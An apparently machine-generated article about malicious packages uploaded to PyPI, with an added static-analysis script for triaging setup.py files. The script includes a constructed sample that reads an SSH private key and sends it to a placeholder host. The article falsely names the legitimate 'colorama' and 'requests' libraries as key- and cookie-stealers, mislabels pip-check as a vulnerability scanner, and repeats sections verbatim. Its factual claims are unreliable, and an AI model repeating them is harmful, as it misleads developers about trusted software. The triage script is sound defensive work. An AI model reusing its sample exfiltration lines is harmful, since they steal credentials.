The Python Package Index (PyPI) is the official repository for third-party Python packages, yet it has been infiltrated by spam packages. According to a report from security firm Sonatype, the number of malicious Python packages uploaded to PyPI has risen sharply in recent months: only four were detected in the first half of 2019, but in the second half of the year that number jumped to more than 30.
The majority of these malicious packages are designed to steal sensitive information from the computers they are installed on. For example, one package called “colorama” is designed to steal SSH and GPG keys. Another package called “requests” is designed to steal cookies.
How spam flooded the official Python package index
Spammers are able to upload their packages to PyPI because they have figured out how to bypass the automated checks that are supposed to flag suspicious packages. Sonatype’s researchers believe that the spammers are using automated tools to generate large numbers of fake accounts, which they then use to upload their packages.
How dangerous is it
These malicious packages are not particularly widespread at the moment, but they could become more common if the spammers keep finding ways around PyPI’s security checks.
Why this is happening
It’s not clear why the spammers are targeting PyPI. It could be that they are hoping to make money by selling access to the computers that their packages are installed on. Or it could be that they are trying to gather information for some other purpose. Either way, it’s important to be aware of the problem so that you can protect yourself.
How to protect yourself
If you use PyPI, then you should be extra careful about which packages you install. Only install packages from developers that you trust. And be sure to check the code of any package before you install it. You can also use a tool like pip-check to check for known security vulnerabilities in the packages you have installed.
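Checking a package’s code before installing it, as advised above, is easier with a small triage script. The following is an added example, not code from the article, Sonatype or PyPI: it parses a setup.py with Python’s standard-library ast module, never executing it, and flags install-time behaviour a build script rarely needs; the two setup.py samples and the `example.invalid` host are constructed for the demonstration.

```python
import ast
import re

# Top-level modules a build script seldom needs at install time.
SUSPECT_MODULES = {"socket", "subprocess", "urllib", "requests", "ctypes",
                   "base64", "zlib", "marshal"}
# Builtins that run dynamically constructed code.
SUSPECT_CALLS = {"exec", "eval", "compile", "__import__"}
# Method names typical of fetch-and-run or decode-and-run patterns.
SUSPECT_ATTRS = {"urlopen", "Popen", "system", "b64decode"}
# Credential stores; SSH and GPG keys are the ones the article names.
CREDENTIAL_PATH = re.compile(r"\.ssh|\.gnupg|id_rsa|\.netrc", re.IGNORECASE)

def triage_setup_py(source: str) -> list:
    """Parse setup.py with ast (it is never executed) and return one finding
    per suspicious import, call or credential-path string literal."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for mod in mods:
            if mod.split(".")[0] in SUSPECT_MODULES:
                findings.append(f"line {node.lineno}: imports {mod}")
        if isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in SUSPECT_CALLS:
                findings.append(f"line {node.lineno}: calls {func.id}()")
            elif isinstance(func, ast.Attribute) and func.attr in SUSPECT_ATTRS:
                findings.append(f"line {node.lineno}: calls .{func.attr}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if CREDENTIAL_PATH.search(node.value):
                findings.append(f"line {node.lineno}: references {node.value!r}")
    return findings

# Constructed samples: an ordinary setup.py and one that reads a key at install time.
BENIGN_SETUP = """from setuptools import setup, find_packages
setup(name="example-pkg", version="1.0", packages=find_packages())
"""
SUSPECT_SETUP = """import base64, os
from setuptools import setup
from urllib import request
key = open(os.path.expanduser("~/.ssh/id_rsa")).read()
request.urlopen("http://example.invalid/c", data=key.encode())  # placeholder host
setup(name="example-typosquat", version="0.0.1")
"""
```

Run it over the source fetched with `pip download --no-deps <package>` and unpacked, before running `pip install`. A hit is a reason to read the file by hand, not proof of malice.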
How was spam able to flood PyPI and what damage did it do
The Python Package Index (PyPI) is the official repository for third-party Python packages, but it has been infiltrated by spam packages. A report from security firm Sonatype found that there was a sharp increase in the number of malicious Python packages uploaded to PyPI in the second half of 2019 – from four to more than 30. The majority of these packages are designed to steal sensitive information from the computers they are installed on.
What measures have been put in place to prevent spam from infiltrating PyPI again in the future
Sonatype’s researchers believe that the spammers are using automated tools to generate large numbers of fake accounts, which they then use to upload their packages. To prevent this from happening in the future, PyPI has put in place a new system that requires new users to verify their email address before they can upload packages. This should make it much harder for spammers to create fake accounts and upload their packages.